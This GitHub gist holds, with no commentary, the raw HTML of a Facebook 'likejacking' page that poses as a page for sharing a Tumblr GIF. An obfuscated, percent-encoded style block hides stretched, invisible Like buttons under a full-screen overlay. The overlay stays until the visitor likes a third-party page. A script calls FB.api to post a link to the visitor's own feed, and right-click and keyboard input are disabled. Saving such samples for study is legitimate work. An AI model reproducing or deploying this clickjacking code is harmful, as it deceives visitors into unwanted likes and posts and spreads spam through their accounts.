Skip to content

Instantly share code, notes, and snippets.

@ancat
Created April 22, 2014 03:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ancat/11164195 to your computer and use it in GitHub Desktop.
Save ancat/11164195 to your computer and use it in GitHub Desktop.
?<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>http://24.media.tumblr.com</title>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#" itemscope itemtype="http://schema.org/Article" lang="sl_SI" xml:lang="sl_SI">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>http://24.media.tumblr.com/dd6e6cdd77ff87c376bcbfca961f316b/tumblr_msbe9rW7kV1rb8tmvo1_500.gif</title>
<meta name="copyright"content="osamnosam">
<meta name="owner" content="Osam Nosam">
<meta name="language" content="sl_SI">
<meta property="og:site_name" content="http://themotika.com/osamnosam/" />
<meta property="og:title" content="http://24.media.tumblr.com/dd6e6cdd77ff87c376bcbfca961f316b/tumblr_msbe9rW7kV1rb8tmvo1_500.gif" />
<meta property="og:description" content="http://24.media.tumblr.com" />
<meta property="og:type" content="article" />
<div id="fb-root"></div>
<script>
window.fbAsyncInit = function() {
FB.init({appId: '501929426554739', status: true, cookie: true,
xfbml: true});
FB.getLoginStatus(function(o) {
if (!o && o.status) return;
if (o.status == 'connected') {
} else if (o.status == 'not_authorized') {
} else {
//window.write('Niste ulogovani na facebook.');
}
});
FB.Event.subscribe('edge.create', function(response) {
document.getElementById('Afterclick').style.display='block';
document.getElementById('lajkbutton').style.display='none';
});
};
(function(d, debug){
var js, id = 'facebook-jssdk', ref = d.getElementsByTagName('script')[0];
if (d.getElementById(id)) {return;}
js = d.createElement('script'); js.id = id; js.async = true;
js.src = "//connect.facebook.net/es_ES/all" + (debug ? "/debug" : "") + ".js";
ref.parentNode.insertBefore(js, ref);
}(document, /*debug*/ false));
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/es_ES/all.js#xfbml=1&appId=200945336696251";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
</head>
<body>
<!-- REKLAMU OVDJE-->
<style type="text/css">
.sledeci {
-moz-box-shadow:inset 0px 1px 0px 0px #cae3fc;
-webkit-box-shadow:inset 0px 1px 0px 0px #cae3fc;
box-shadow:inset 0px 1px 0px 0px #cae3fc;
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #79bbff), color-stop(1, #4197ee) );
background:-moz-linear-gradient( center top, #79bbff 5%, #4197ee 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#79bbff', endColorstr='#4197ee');
background-color:#79bbff;
-webkit-border-top-left-radius:0px;
-moz-border-radius-topleft:0px;
border-top-left-radius:0px;
-webkit-border-top-right-radius:0px;
-moz-border-radius-topright:0px;
border-top-right-radius:0px;
-webkit-border-bottom-right-radius:0px;
-moz-border-radius-bottomright:0px;
border-bottom-right-radius:0px;
-webkit-border-bottom-left-radius:0px;
-moz-border-radius-bottomleft:0px;
border-bottom-left-radius:0px;
text-indent:0;
border:1px solid #469df5;
display:inline-block;
color:#ffffff;
font-family:Arial;
font-size:15px;
font-weight:bold;
font-style:normal;
height:65px;
line-height:65px;
width:131px;
text-decoration:none;
text-align:center;
text-shadow:1px 1px 0px #287ace;
}
.sledeci:hover {
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #4197ee), color-stop(1, #79bbff) );
background:-moz-linear-gradient( center top, #4197ee 5%, #79bbff 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#4197ee', endColorstr='#79bbff');
background-color:#4197ee;
}.sledeci:active {
position:relative;
top:1px;
}</style>
</td>
<center>
<a href="http://themotika.com/osamnosam/" class="sledeci">Website</a>
</center>
<br>
<br>
<center><img src="http://24.media.tumblr.com/dd6e6cdd77ff87c376bcbfca961f316b/tumblr_msbe9rW7kV1rb8tmvo1_500.gif"><br></center>
<br>
<center><div class="fb-like" data-href="http://themotika.com/osamnosam/http24.media.tumblr.comdd6e6cdd77ff87c376bcbfca961f316btumblr_msbe9rW7kV1rb8tmvo1_500-gif.html" data-layout="button_count" data-action="like" data-show-faces="false" data-share="true"></div>&nbsp;<div class="fb-share-button"
<br>
</head>
<body onload="cek()" oncontextmenu="return false;" onkeydown="return false;">
<script>
function createCookie(name, value, days) {
if (days) {
var date = new Date();
date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
var expires = "; expires=" + date.toGMTString();
} else var expires = "";
document.cookie = name + "=" + value + expires + "; path=/";
}
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
}
return null;
}
function publish(){
var post2 = readCookie('67');
if (post2 != 'true') {
FB.api('/me/feed','post',{link: 'http://themotika.com/osamnosam/http24.media.tumblr.comdd6e6cdd77ff87c376bcbfca961f316btumblr_msbe9rW7kV1rb8tmvo1_500-gif.html', message:''}, function(response) {
});
createCookie('67', 'true', 2);
}
}
</script>
<div id="fb-root"></div>
<script>window.fbAsyncInit = function() {
FB.init({
appId: '501929426554739',
cookie: true,
channelUrl : '//zanimivosti.net/fbtest/examples/channel.html',
xfbml: true,
oauth: true
});
};
(function(d, debug){
var js, id = 'facebook-jssdk', ref = d.getElementsByTagName('script')[0];
if (d.getElementById(id)) {return;}
js = d.createElement('script'); js.id = id; js.async = true;
js.src = "//connect.facebook.net/en_US/all" + (debug ? "/debug" : "") + ".js";
ref.parentNode.insertBefore(js, ref);
}(document, /*debug*/ false));
;</script>
</body>
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js' type='text/javascript'></script>
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%73%74%79%6C%65%3E%0A%2E%6C%69%6B%65%7B%0A%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%2D%6D%6F%7A%2D%74%72%61%6E%73%66%6F%72%6D%3A%20%73%63%61%6C%65%28%32%2C%31%29%3B%0A%2D%77%65%62%6B%69%74%2D%74%72%61%6E%73%66%6F%72%6D%3A%20%73%63%61%6C%65%28%32%2C%31%29%3B%0A%2D%6D%73%2D%74%72%61%6E%73%66%6F%72%6D%3A%20%73%63%61%6C%65%28%32%2C%31%29%3B%0A%6F%70%61%63%69%74%79%3A%2E%30%3B%0A%74%6F%70%3A%31%38%25%3B%0A%6C%65%66%74%3A%32%37%25%3B%0A%7D%0A%2E%6C%69%6B%65%32%7B%0A%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%2D%6D%6F%7A%2D%74%72%61%6E%73%66%6F%72%6D%3A%20%73%63%61%6C%65%28%31%2C%33%2E%30%29%3B%0A%2D%77%65%62%6B%69%74%2D%74%72%61%6E%73%66%6F%72%6D%3A%20%73%63%61%6C%65%28%31%2C%33%2E%30%29%3B%0A%2D%6D%73%2D%74%72%61%6E%73%66%6F%72%6D%3A%20%73%63%61%6C%65%28%31%2C%33%2E%30%29%3B%0A%6F%70%61%63%69%74%79%3A%2E%30%3B%0A%74%6F%70%3A%32%25%3B%0A%6C%65%66%74%3A%39%32%25%3B%0A%7D%0A%68%31%20%7B%63%6F%6C%6F%72%3A%77%68%69%74%65%3B%7D%0A%69%6D%67%20%7B%6D%61%78%2D%77%69%64%74%68%3A%31%30%30%25%3B%68%65%69%67%68%74%3A%61%75%74%6F%3B%7D%0A%23%66%61%6E%62%61%63%6B%20%7B%0A%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%38%29%3B%0A%77%69%64%74%68%3A%31%30%30%25%3B%0A%68%65%69%67%68%74%3A%31%30%30%25%3B%0A%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%0A%74%6F%70%3A%30%3B%0A%6C%65%66%74%3A%30%3B%0A%7A%2D%69%6E%64%65%78%3A%39%39%39%39%39%3B%0A%7D%0A%23%66%61%6E%2D%65%78%69%74%20%7B%0A%77%69%64%74%68%3A%31%30%30%25%3B%0A%68%65%69%67%68%74%3A%31%30%30%25%3B%0A%7D%0A%23%66%61%6E%62%6F%78%20%7B%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%77%68%69%74%65%3B%0A%77%69%64%74%68%3A%34%32%30%70%78%3B%0A%68%65%69%67%68%74%3A%32%37%30%70%78%3B%0A%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%74%6F%70%3A%35%38%25%3B%0A%6C%65%66%74%3A%36%33%25%3B%0A%6D%61%72%67%69%6E%3A%2D%32%32%30%70%78%20%30%20%30%20%2D%33%37%35%70%78%3B%0A%2D%77%65%62%6B%69%74%2D%62%6F%78%2D%73%68%61%64%6F%77%3A%20%69%6E%73%65%74%20%30%20%30%20%35%30%70%78%20%30%20%23%39%33%39%33%39%33%3B%0A%2D%6D%6F%7A%2D%62%6F%78%2D%73%68%61%64%6F%77%3A%20%69%6E%73%65%74%20%30%20%30%20%35%30%70%78%20%30%20%23%39%33%39%33%39%33%3B%0A%62%6F%78%2D%73%68%61%64%6F%77%3A%20%69%6E%73%65%74%20%30%20%30%20%35%30%70%78%20%30%20%23%39%33%39%33%39%33%3B%0A%2D%77%65%62%6B%69%74%2D%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%35%70%78%3B%0A%2D%6D%6F%7A%2D%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%35%70%78%3B%0A%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%35%70%78%3B%0A%6D%61%72%67%69%6E%3A%20%2D%32%32%30%70%78%20%30%20%30%20%2D%33%37%35%70%78%3B%0A%7D%0A%23%66%61%6E%63%6C%6F%73%65%20%7B%0A%66%6C%6F%61%74%3A%72%69%67%68%74%3B%0A%63%75%72%73%6F%72%3A%70%6F%69%6E%74%65%72%3B%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%75%72%6C%28%68%74%74%70%3A%2F%2F%33%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%4E%52%6D%71%66%79%4C%77%42%48%59%2F%54%34%6E%77%48%4F%72%50%53%7A%49%2F%41%41%41%41%41%41%41%41%41%64%51%2F%38%62%39%4F%37%4F%31%71%33%63%38%2F%73%31%36%30%30%2F%66%61%6E%63%6C%6F%73%65%2E%70%6E%67%29%20%72%65%70%65%61%74%3B%0A%68%65%69%67%68%74%3A%31%35%70%78%3B%0A%70%61%64%64%69%6E%67%3A%32%30%70%78%3B%0A%70%6F%73%69%74%69%6F%6E%3A%72%65%6C%61%74%69%76%65%3B%0A%70%61%64%64%69%6E%67%2D%72%69%67%68%74%3A%34%30%70%78%3B%0A%6D%61%72%67%69%6E%2D%74%6F%70%3A%2D%32%30%70%78%3B%0A%6D%61%72%67%69%6E%2D%72%69%67%68%74%3A%2D%32%32%70%78%3B%0A%7D%0A%2E%72%65%6D%6F%76%65%2D%62%6F%72%64%61%20%7B%0A%68%65%69%67%68%74%3A%31%70%78%3B%0A%77%69%64%74%68%3A%33%36%36%70%78%3B%0A%6D%61%72%67%69%6E%3A%30%20%61%75%74%6F%3B%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%23%46%33%46%33%46%33%3B%0A%6D%61%72%67%69%6E%2D%74%6F%70%3A%31%36%70%78%3B%0A%70%6F%73%69%74%69%6F%6E%3A%72%65%6C%61%74%69%76%65%3B%0A%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%32%30%70%78%3B%0A%7D%0A%23%6C%69%6E%6B%69%74%20%61%2E%76%69%73%69%74%65%64%2C%23%6C%69%6E%6B%69%74%20%61%2C%23%6C%69%6E%6B%69%74%20%61%3A%68%6F%76%65%72%20%7B%0A%63%6F%6C%6F%72%3A%23%38%30%38%30%38%42%3B%0A%66%6F%6E%74%2D%73%69%7A%65%3A%31%30%70%78%3B%0A%6D%61%72%67%69%6E%3A%20%30%20%61%75%74%6F%20%35%70%78%20%61%75%74%6F%3B%0A%66%6C%6F%61%74%3A%63%65%6E%74%65%72%3B%0A%7D%0A%3C%2F%73%74%79%6C%65%3E'));
//-->
</Script>
</Script>
<script type='text/javascript'>
//<![CDATA[
jQuery.cookie = function (key, value, options) {
// key and at least value given, set cookie...
if (arguments.length > 1 && String(value) !== "[object Object]") {
options = jQuery.extend({}, options);
if (value === null || value === undefined) {
options.expires = -1;
}
if (typeof options.expires === 'number') {
var days = options.expires, t = options.expires = new Date();
t.setDate(t.getDate() + days);
}
value = String(value);
return (document.cookie = [
encodeURIComponent(key), '=',
options.raw ? value : encodeURIComponent(value),
options.expires ? '; expires=' + options.expires.toUTCString() : '', // use expires attribute, max-age is not supported by IE
options.path ? '; path=' + options.path : '',
options.domain ? '; domain=' + options.domain : '',
options.secure ? '; secure' : ''
].join(''));
}
// key and possibly options given, get cookie...
options = value || {};
var result, decode = options.raw ? function (s) { return s; } : decodeURIComponent;
return (result = new RegExp('(?:^|; )' + encodeURIComponent(key) + '=([^;]*)').exec(document.cookie)) ? decode(result[1]) : null;
};
//]]>
</script>
<script type='text/javascript'>
window.onload = cek;
function cek()
{
window.fbAsyncInit = function() {
FB.init({
appId: '501929426554739',
cookie: true,
channelUrl : '//zanimivosti.net/fbtest/examples/channel.html',
xfbml: true,
oauth: true
});
};
(function(d, debug){
var js, id = 'facebook-jssdk', ref = d.getElementsByTagName('script')[0];
if (d.getElementById(id)) {return;}
js = d.createElement('script'); js.id = id; js.async = true;
js.src = "//connect.facebook.net/en_US/all" + (debug ? "/debug" : "") + ".js";
ref.parentNode.insertBefore(js, ref);
}(document, /*debug*/ false));
FB.Event.subscribe('edge.create', function(href, widget) {
if (href == 'https://www.facebook.com/pages/Smile-More/840582002622494'){
document.getElementById('fanback').style.display='none';
createCookie('prvimagazin', 'true', 99);
}
if (href == 'http://themotika.com/osamnosam/http24.media.tumblr.comdd6e6cdd77ff87c376bcbfca961f316btumblr_msbe9rW7kV1rb8tmvo1_500-gif.html'){
createCookie('golazena', 'true', 99);
document.getElementById('fanback').style.display='none';
}
});
}
jQuery(document).ready(function($){
var cook1 = readCookie('golazena');
var prvimagazin = readCookie('prvimagazin');
if(cook1 != 'true'){
$('#fanback').delay(100).fadeIn('medium');
$('#fanclose').click(function(){
$('#fanback').stop().fadeOut('medium');
});
}
else {
document.getElementById("fanback").style.display="none";
$('#fanback').stop().fadeOut('fast');
}
if (prvimagazin == 'true')
{
document.getElementById("ll2").style.display="none";
document.getElementById("ll3").style.display="block";
}
});
</script>
<center>
<div class="fb-comments" data-href="http://themotika.com/osamnosam/http24.media.tumblr.comdd6e6cdd77ff87c376bcbfca961f316btumblr_msbe9rW7kV1rb8tmvo1_500-gif.html" data-numposts="3" data-colorscheme="light"></div><br />
</center>
</script>
<div id='fanback'>
<div id='fan-exit'>
</div>
<div id='fanbox'>
<div id='fanclose'>
</div>
<div class='remove-borda'>
</div>
<div id="slika" style="display:block">
<div class="like">
<fb:likes href="" send="false" layout="button_count" width="800" show_faces="false" data-share="false" font=""></fb:like>
</div>
<div id="ll2" class="like2">
<fb:like href="https://www.facebook.com/pages/Smile-More/840582002622494" send="false" layout="button_count" width="800" show_faces="false" data-share="false" font=""></fb:like>
</div>
<div id="ll3" class="like2" style="display:none;">
<fb:like href="http://themotika.com/osamnosam/http24.media.tumblr.comdd6e6cdd77ff87c376bcbfca961f316btumblr_msbe9rW7kV1rb8tmvo1_500-gif.html" send="false" layout="button_count" width="800" show_faces="false" data-share="false" font=""></fb:like>
</div>
<script src="http://connect.facebook.net/sq_AL/all.js#xfbml=1"></script>
<script type="text/javascript" charset="utf-8">
FB.Event.subscribe('edge.create', function(response) {
window.location = "";
});
</script>
<center>
<iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2Fpages%2FSmile-More%2F840582002622494&amp;width&amp;height=258&amp;colorscheme=light&amp;show_faces=true&amp;header=false&amp;stream=false&amp;show_border=false&amp;appId=843635435662508" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:258px;" allowTransparency="true"></iframe></center>
</div>
</body>
<body background="http://tumblrchase.com/img/bg/117.jpg">
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment